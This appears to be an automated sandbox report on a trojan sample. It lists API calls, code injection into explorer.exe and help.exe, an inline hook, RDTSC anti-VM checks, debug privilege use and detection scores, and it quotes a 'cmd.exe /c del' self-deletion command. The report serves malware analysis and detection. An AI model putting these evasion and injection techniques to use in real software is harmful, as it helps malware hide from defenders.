Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03891D55	2_2_03891D55
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F2581	2_2_037F2581
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038920A8	2_2_038920A8
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D841F	2_2_037D841F
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881002	2_2_03881002
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F20A0	2_2_037F20A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037DB090	2_2_037DB090
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDC3D8	2_2_02DDC3D8
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDEB5F	2_2_02DDEB5F
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDEB62	2_2_02DDEB62
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DC9E50	2_2_02DC9E50
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DC2FB0	2_2_02DC2FB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDE5C0	2_2_02DDE5C0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DC2D90	2_2_02DC2D90

Source: C:\Windows\SysWOW64\help.exe

Code function: String function: 037CB150 appears 35 times

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039A350 NtCreateFile,	0_2_0039A350
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039A400 NtReadFile,	0_2_0039A400
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039A480 NtClose,	0_2_0039A480
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039A530 NtAllocateVirtualMemory,	0_2_0039A530
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039A34A NtCreateFile,	0_2_0039A34A
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039A47A NtClose,	0_2_0039A47A
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039A44A NtReadFile,	0_2_0039A44A
Source: C:\Windows\explorer.exe	Code function: 1_2_047A8232 NtCreateFile,	1_2_047A8232
Source: C:\Windows\explorer.exe	Code function: 1_2_047A9E12 NtProtectVirtualMemory,	1_2_047A9E12
Source: C:\Windows\explorer.exe	Code function: 1_2_047A9E0A NtProtectVirtualMemory,	1_2_047A9E0A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809780 NtMapViewOfSection,LdrInitializeThunk,	2_2_03809780
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809FE0 NtCreateMutant,LdrInitializeThunk,	2_2_03809FE0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809710 NtQueryInformationToken,LdrInitializeThunk,	2_2_03809710
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038096D0 NtCreateKey,LdrInitializeThunk,	2_2_038096D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038096E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_038096E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809650 NtQueryValueKey,LdrInitializeThunk,	2_2_03809650
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809A50 NtCreateFile,LdrInitializeThunk,	2_2_03809A50
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_03809660
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038099A0 NtCreateSection,LdrInitializeThunk,	2_2_038099A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038095D0 NtClose,LdrInitializeThunk,	2_2_038095D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_03809910
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809540 NtReadFile,LdrInitializeThunk,	2_2_03809540
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809840 NtDelayExecution,LdrInitializeThunk,	2_2_03809840
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03809860
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038097A0 NtUnmapViewOfSection,	2_2_038097A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0380A3B0 NtGetContextThread,	2_2_0380A3B0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809B00 NtSetValueKey,	2_2_03809B00
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0380A710 NtOpenProcessToken,	2_2_0380A710
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809730 NtQueryVirtualMemory,	2_2_03809730
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809760 NtOpenProcess,	2_2_03809760
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809770 NtSetInformationFile,	2_2_03809770
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0380A770 NtOpenThread,	2_2_0380A770
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809A80 NtOpenDirectoryObject,	2_2_03809A80
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809A00 NtProtectVirtualMemory,	2_2_03809A00
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809610 NtEnumerateValueKey,	2_2_03809610
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809A10 NtQuerySection,	2_2_03809A10
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809A20 NtResumeThread,	2_2_03809A20
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809670 NtQueryInformationProcess,	2_2_03809670
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038099D0 NtCreateProcessEx,	2_2_038099D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038095F0 NtQueryInformationFile,	2_2_038095F0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809520 NtWaitForSingleObject,	2_2_03809520
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0380AD30 NtSetContextThread,	2_2_0380AD30
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809950 NtQueueApcThread,	2_2_03809950
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809560 NtWriteFile,	2_2_03809560
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038098A0 NtWriteVirtualMemory,	2_2_038098A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038098F0 NtReadVirtualMemory,	2_2_038098F0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03809820 NtEnumerateKey,	2_2_03809820
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0380B040 NtSuspendThread,	2_2_0380B040
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDA350 NtCreateFile,	2_2_02DDA350
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDA480 NtClose,	2_2_02DDA480
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDA400 NtReadFile,	2_2_02DDA400
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDA530 NtAllocateVirtualMemory,	2_2_02DDA530
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDA34A NtCreateFile,	2_2_02DDA34A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDA44A NtReadFile,	2_2_02DDA44A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDA47A NtClose,	2_2_02DDA47A

Source: S22Ls0H4Sz.exe

Static PE information: No import functions for PE file found

Source: S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000E8F000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs S22Ls0H4Sz.exe
Source: S22Ls0H4Sz.exe, 00000000.00000003.281707560.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs S22Ls0H4Sz.exe
Source: S22Ls0H4Sz.exe, 00000000.00000003.246037562.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs S22Ls0H4Sz.exe
Source: S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000CFF000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs S22Ls0H4Sz.exe
Source: S22Ls0H4Sz.exe, 00000000.00000003.243678010.00000000009B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs S22Ls0H4Sz.exe
Source: S22Ls0H4Sz.exe, 00000000.00000003.281707560.00000000007C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs S22Ls0H4Sz.exe

Source: S22Ls0H4Sz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: S22Ls0H4Sz.exe

Static PE information: Section .text

Source: S22Ls0H4Sz.exe	ReversingLabs: Detection: 79%
Source: S22Ls0H4Sz.exe	Virustotal: Detection: 62%

Source: S22Ls0H4Sz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\S22Ls0H4Sz.exe C:\Users\user\Desktop\S22Ls0H4Sz.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\S22Ls0H4Sz.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\S22Ls0H4Sz.exe"	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/1@3/2

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: S22Ls0H4Sz.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: S22Ls0H4Sz.exe, 00000000.00000003.246037562.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000CFF000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000003.243678010.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.281704027.000000000346B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.285219757.0000000003605000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: S22Ls0H4Sz.exe, 00000000.00000003.246037562.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000CFF000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000003.243678010.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, help.exe, help.exe, 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.281704027.000000000346B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.285219757.0000000003605000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: help.pdbGCTL source: S22Ls0H4Sz.exe, 00000000.00000003.281707560.00000000007BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: help.pdb source: S22Ls0H4Sz.exe, 00000000.00000003.281707560.00000000007BC000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_00397168 pushfd ; iretd	0_2_0039716A
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_00397A35 push eax; iretd	0_2_00397A36
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_00396AE8 push FFFFFFE8h; ret	0_2_00396AF3
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0038E2C7 push cs; ret	0_2_0038E2D4
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_00397C76 push esp; ret	0_2_00397C79
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039D4A5 push eax; ret	0_2_0039D4F8
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039D4FB push eax; ret	0_2_0039D562
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039D4F2 push eax; ret	0_2_0039D4F8
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039D55C push eax; ret	0_2_0039D562
Source: C:\Windows\explorer.exe	Code function: 1_2_047AE07A push esp; ret	1_2_047AE07B
Source: C:\Windows\explorer.exe	Code function: 1_2_047ABB1E push esp; retn 0000h	1_2_047ABB1F
Source: C:\Windows\explorer.exe	Code function: 1_2_047ABB02 push esp; retn 0000h	1_2_047ABB03
Source: C:\Windows\explorer.exe	Code function: 1_2_047AB9B5 push esp; retn 0000h	1_2_047ABAE7
Source: C:\Windows\explorer.exe	Code function: 1_2_0DEB79B5 push esp; retn 0000h	1_2_0DEB7AE7
Source: C:\Windows\explorer.exe	Code function: 1_2_0DEBA07A push esp; ret	1_2_0DEBA07B
Source: C:\Windows\explorer.exe	Code function: 1_2_0DEB7B02 push esp; retn 0000h	1_2_0DEB7B03
Source: C:\Windows\explorer.exe	Code function: 1_2_0DEB7B1E push esp; retn 0000h	1_2_0DEB7B1F
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0381D0D1 push ecx; ret	2_2_0381D0E4
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DCE2C7 push cs; ret	2_2_02DCE2D4
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DD6AE8 push FFFFFFE8h; ret	2_2_02DD6AF3
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DD7A35 push eax; iretd	2_2_02DD7A36
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDE000 push edi; ret	2_2_02DDE002
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DD7168 pushfd ; iretd	2_2_02DD716A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDD4FB push eax; ret	2_2_02DDD562
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDD4F2 push eax; ret	2_2_02DDD4F8
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDD4A5 push eax; ret	2_2_02DDD4F8
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DD7C76 push esp; ret	2_2_02DD7C79
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_02DDD55C push eax; ret	2_2_02DDD562

Source: initial sample

Static PE information: section name: .text entropy: 7.410112834615964

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE1

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	RDTSC instruction interceptor: First address: 0000000000389904 second address: 000000000038990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	RDTSC instruction interceptor: First address: 0000000000389B6E second address: 0000000000389B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 0000000002DC9904 second address: 0000000002DC990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 0000000002DC9B6E second address: 0000000002DC9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_1-13919

Source: C:\Windows\SysWOW64\help.exe TID: 1132

Thread sleep time: -50000s >= -30000s

Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe

Code function: 0_2_00389AA0 rdtsc

0_2_00389AA0

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 867			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 865			Jump to behavior

Source: C:\Windows\SysWOW64\help.exe

API coverage: 9.6 %

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe

Process information queried: ProcessInformation

Jump to behavior

Source: explorer.exe, 00000001.00000002.517521328.0000000007AFF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000001.00000002.517521328.0000000007B66000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
Source: explorer.exe, 00000001.00000000.261568218.000000000F240000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000002.517521328.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.253318381.0000000005EF4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.256946409.0000000007BC1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: prY\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}00
Source: explorer.exe, 00000001.00000000.261568218.000000000F240000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}n1
Source: explorer.exe, 00000001.00000002.517521328.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
Source: explorer.exe, 00000001.00000003.464031799.000000000F5CA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.522819505.000000000F5CA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllate
Source: explorer.exe, 00000001.00000000.261568218.000000000F240000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: explorer.exe, 00000001.00000002.517521328.0000000007BC1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60200-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
Source: explorer.exe, 00000001.00000003.464031799.000000000F5CA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.522819505.000000000F5CA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWkl#e
Source: explorer.exe, 00000001.00000003.467170248.0000000005F25000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000001.00000000.261568218.000000000F240000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe

Code function: 0_2_00389AA0 rdtsc

0_2_00389AA0

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0388138A mov eax, dword ptr fs:[00000030h]	2_2_0388138A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F3B7A mov eax, dword ptr fs:[00000030h]	2_2_037F3B7A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F3B7A mov eax, dword ptr fs:[00000030h]	2_2_037F3B7A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0387D380 mov ecx, dword ptr fs:[00000030h]	2_2_0387D380
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03847794 mov eax, dword ptr fs:[00000030h]	2_2_03847794
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03847794 mov eax, dword ptr fs:[00000030h]	2_2_03847794
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03847794 mov eax, dword ptr fs:[00000030h]	2_2_03847794
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CDB60 mov ecx, dword ptr fs:[00000030h]	2_2_037CDB60
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037DFF60 mov eax, dword ptr fs:[00000030h]	2_2_037DFF60
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CF358 mov eax, dword ptr fs:[00000030h]	2_2_037CF358
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03895BA5 mov eax, dword ptr fs:[00000030h]	2_2_03895BA5
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CDB40 mov eax, dword ptr fs:[00000030h]	2_2_037CDB40
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037DEF40 mov eax, dword ptr fs:[00000030h]	2_2_037DEF40
